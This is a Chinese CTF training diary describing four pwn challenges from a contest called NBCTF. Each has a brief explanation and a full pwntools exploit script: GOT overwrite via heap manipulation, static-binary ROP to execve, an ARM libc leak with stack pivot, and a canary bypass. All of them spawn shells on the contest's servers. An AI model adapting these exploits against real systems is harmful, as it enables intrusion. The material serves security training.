CTF特训日记day2

day2打了一个叫NBCTF的比赛

做了四个题，剩下五道arm的题不会做了，关注一下wp，也许可以靠这个比赛提升一波异架构能力。

heapnotes

2.31简单堆题，没啥好说的，直接改got就行了

from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io=remote('chal.nbctf.com',30172)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["qemu-aarch64",  "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#print("please start gdb")
#s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
def menu(choice):
    sla("> ",str(choice))
def add(context):
    menu(1)
    sla("Input note data: ",context)
def show(index):
    menu(2)
    sla("): ",str(index))
def edit(index,context):
    menu(3)
    sla("): ",str(index))
    sla("Input note data: ",context)
def free(index):
    menu(4)
    sla("): ",str(index))

bss=0x404120
add('/bin/sh\x00')
add('a'*8)
add('/bin/sh\x00')
free(0)
free(1)
show(1)
heapbase=u64(io.recvline()[:-1].ljust(8,'\x00'))-0x2a0
lg("heapbase")
edit(1,'a'*0x10)
free(1)
add(p64(0x404020))
add('a'*8)
add(p64(elf.plt['system']))
show(2)
#gdb.attach(io)
irt()

ribbit

直接写rop硬拿shell就好，不用管它什么所谓的win函数，反正程序是静态编译的，什么gadget都有

from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
#io=gdb.debug('./pwn','b*0x401922')
io=remote("chal.nbctf.com",30170)
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
#io=remote('chal.nbctf.com',30172)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["qemu-aarch64",  "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#print("please start gdb")
#s=raw_input()
#libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
rdi_ret=0x000000000040201f
rsi_ret=0x000000000040a04e
rdx_ret=0x000000000047fe1a
rax_ret=0x0000000000449267
win=0x401825
puts=0x40c7b0
t_read=0x448800
bss=0x4C6800
syscall=0x0000000000401dd4

payload='a'*0x28+p64(rdi_ret)+p64(0)+p64(rsi_ret)+p64(bss)+p64(rdx_ret)+p64(8)+p64(t_read)+p64(rdi_ret)+p64(bss)+p64(rsi_ret)+p64(0)+p64(rdx_ret)+p64(0)+p64(rax_ret)+p64(59)+p64(syscall)
#payload='You got this!'+'\x00'*8+'Just do it!'+'\x00'*8+p64(rdi_ret)+p64(0xF10C70B33F)+p64(rax_ret)+p64(rsi_ret)+p64(win)
sla("Can you give my pet frog some motivation to jump out the hole?",payload)
io.send('/bin/sh\x00')
irt()

ret2thumb

用自己的qemu-arm就可以直接怼shellcode，用它给的就不行，有点奇怪，而且每天东这个题和thumb有什么关系，直接泄露libc然后栈迁移到bss上直接rop就行，不过要事先找到能控制r0的gadget，直接ROPgadget搜只能搜到控制fp,r3和r4的gadget，但是仔细找的话会发现如果把0x10500地址处的mov r0,r3;pop {fp,pc} 和pop {r3,pc}结合起来的话是可以做到直接控制r0的这也是为什么可以直接泄露libc去进行rop的原因

from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch='arm'

#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io=remote('chal.nbctf.com',30175)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["./qemu-arm",  "-g","4321","-L", ".", "./pwn"])
#io=process(["./qemu-arm",  "-L", ".", "./pwn"])
#print("please start gdb")
s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
main=0x10510
bss=0x12600
gadget=0x104F0
r3_pc=0x00010388
r0_r3=0x10550
payload='a'*0x20+p32(bss)+p32(r3_pc)+p32(elf.got['puts'])+p32(r0_r3)+p32(bss+0x24)+p32(gadget)+p32(0)+p32(bss)
sla("Can you ret2thumb? \n",payload)
libcbase=u64(io.recvline()[:-1].ljust(8,'\x00'))-libc.sym['puts']
lg("libcbase")
#shellcode=asm(shellcraft.thumb.sh())
system=libcbase+libc.sym['system']
payload='a'*0x24+p32(r3_pc)+p32(bss+0x38)+p32(r0_r3)+p32(bss)+p32(system)+'/bin/sh\x00'
io.sendline(payload)
irt()

canary-in-a-coal-mine

程序给了gets，还给了在栈上写某条从已知地址出发的链上的任意一个数据，有canary，给了后门，所以直接用大量后门地址覆盖栈然后利用给的功能在bss找一个能指向canary的地址写到对应位置上绕过canary保护就可

from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
context.log_level = 'debug'
context.arch='arm'

#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io=remote('chal.nbctf.com',30178)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf=ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["./qemu-arm",  "-g","4321","-L", ".", "./pwn"])
#io=process(["./qemu-arm",  "-L", ".", "./pwn"])
#print("please start gdb")
s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
win=0x10828
def menu(choice):
    sla("> ",str(choice))
def mine(index,depth):
    menu(1)
    sla("mining position\n> ",str(index))
    sla("mining depth\n> ",str(depth))
def extract(index):
    menu(2)
    sla("minecart number\n> ",str(index))
def gets(payload):
    menu(3)
    sla("collapsing mineshaft\n> ",payload)
payload=p32(win+1)*0x20
gets(payload)
guard=0x21038
mine(0x21038,2)
extract(8)
menu(4)
irt()